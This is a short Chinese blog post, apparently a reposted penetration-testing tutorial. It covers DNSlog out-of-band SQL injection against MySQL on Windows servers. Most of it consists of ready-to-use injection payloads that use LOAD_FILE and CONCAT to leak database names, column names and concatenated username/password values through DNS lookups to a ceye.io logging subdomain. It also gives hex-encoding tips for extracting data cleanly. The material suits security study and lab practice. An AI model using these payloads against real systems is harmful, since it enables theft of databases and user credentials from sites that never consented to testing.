通过发送构造好的语句函数,发送后服务器访问指定DNSlog网站从而获得信息,DNSlog注入缓解无回显,请求次数过多的的情况
DNSlog平台:ceye.io
利用load_file()
核心语法:
1 |
SELECT LOAD_FILE(CONCAT('\\',(select database()),'.mysql.r4ourp.ceye.io\abc')); |
前提:
- 目标要为windows系统
- sql语句部分不能存在特殊符号
说明:
select database()为插入的sql语句。
前后为函数的填充。
食用方法:
1 |
1‘ and SELECT LOAD_FILE(CONCAT('\\',(select database()),'.mysql.r4ourp.ceye.io\abc'))--+ |
1 |
1‘ and and SELECT LOAD_FILE(CONCAT('\\',(select column_name from information_schema.columns where table_name="users" limit 1,1),'.mysql.r4ourp.ceye.io\abc'))--+ |
然后去DNSlog平台去看返回内容即可。
由于插入语句不能含特殊符号,在取数据下来时不好判断,可用使用
1 |
concat_ws('A',username,passworf) |
分割.
或者通过hex转换
1 |
hex(concat_ws('A',username,passworf)) |
FROM :https://ailumao.cn/ | Author:Ailumao
DC1-通关手册 DC系列的靶机是一个专门构建的易受攻击的实验室,总共有九个!目的是获得渗透测试领域的经验。 它的设计初学者是一个挑战,但是它的难易程度取决于您的技能和知识以及学习能力。 要成功完成此挑战,您需要具备Linux技能,熟悉Linux命令行以及具有…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论